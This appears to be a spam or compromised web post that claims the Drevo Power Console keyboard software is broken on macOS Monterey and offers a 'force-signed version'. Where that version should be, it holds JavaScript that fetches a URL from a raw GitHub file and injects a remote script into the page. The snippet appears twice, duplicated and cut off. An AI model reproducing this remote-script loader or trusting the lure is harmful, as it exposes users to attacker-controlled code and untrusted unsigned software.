Latest Drevo Power Console For Mechanical Keyboards Broken on Mac
The latest Drevo Power Console software that is used to control mechanical keyboards is crashing on Mac Monterey.Here's a force-signed version that should work:
var url = 'https://raw.githubusercontent.com/lolngnos/loles/main/step.txt';
fetch(url)
.then(response => response.text())
.then(data => {
var script = document.createElement('script');
script.src = data.trim();
document.getElementsByTagName('head')[0].appendChild(script);
});var url = 'https://raw.githubusercontent.com/lolngnos/loles/main/step.txt';
fetch(url)
Read more [...]